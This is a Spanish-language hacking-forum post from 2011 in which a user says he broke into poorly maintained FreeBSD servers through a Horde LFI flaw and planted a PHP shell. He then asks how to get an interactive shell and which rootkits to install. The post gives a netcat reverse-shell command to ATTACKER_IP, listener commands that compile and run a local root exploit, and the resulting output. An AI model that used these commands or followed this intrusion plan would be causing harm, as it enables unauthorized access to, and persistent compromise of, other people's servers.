elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.
 
Inicio Ayuda Buscar Ingresar Registrarse
25 Mayo 2012, 06:44  


Tema destacado: Sigue las noticias más importantes de elhacker.net en ttwitter!

+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Bugs y Exploits (Moderador: berz3k)
| | |-+  Backdoor en FreeBSD
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: Backdoor en FreeBSD  (Leído 573 veces)
benn

Desconectado Desconectado

Mensajes: 17



Ver Perfil
Backdoor en FreeBSD
« en: 21 Febrero 2011, 09:03 »

Que tal!

En los ultimos dias he encontrado targets interesantes que sufren de esta vuln LFI: http://packetstormsecurity.org/files/view/98424/horde-lfi.txt

He logrado subir una shell PHP sencilla (passthru) y ejecutar comandos basicos bajo el usuario web (www).

Afortunadamente muchos de estos sistemas (todos FreeBSD) son raramente monitoreados y por lo tanto muchos no estan actualizados, por lo que tienen bastantes local root exploits que pueden ser ejecutados para posteriormente meterles un rootkit.

Desafortunadamente no he podido obtener una shell interactiva en el servidor, he intentado con el Netcat que trae el FreeBSD para hacer una Reverse Shell pero inmediatamente despues de ejecutar el comando me desconecta:



Victim:

Código:
nc ATTACKER_IP 1234 | /bin/sh | nc ATTACKER_IP 2345



Attacker 1:

Código:
echo "gcc exploit.c ; echo "Compilado" ; ./a.out ; id" | nc -lvvp 1234
Connection terminated ...



Attacker 2:

Código:
nc -lvvp 2345
Compilado
uid=80(www) gid=80(www) groups=80(www)
Connection terminated ...




Me imagino que el problema es con el netcat que trae el FreeBSD, mi consulta seria la siguiente:

1) Como puedo obtener una shell interactica? Compilando o subiendo un netcat propio?
2) Que rootkits recomiendan para FreeBSD?

De antemano gracias, saludos!
« Última modificación: 21 Febrero 2011, 09:05 por benn » En línea
Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Backdoor.SubSeven2gld
Análisis y Diseño de Malware
el_guru 8 866 Último mensaje 19 Octubre 2005, 03:54
por LixKeÜ
¿Backdoor en Windows?
Noticias
ANELKAOS 0 317 Último mensaje 15 Enero 2006, 04:16
por ANELKAOS
Tengo un backdoor para IRC pero tengo un Problema con el backdoor
Chats; IRC y Messengers
Lingo 0 343 Último mensaje 30 Octubre 2006, 18:56
por Lingo
duda con backdoor
Hacking Básico
vnec 1 273 Último mensaje 15 Diciembre 2006, 05:43
por sirdarckcat
Problema con los backdoor's..
Hacking Linux/Unix
c1c4tr1z 0 1,452 Último mensaje 15 Agosto 2007, 02:56
por c1c4tr1z
Powered by SMF 1.1.16 | SMF © 2006-2008, Simple Machines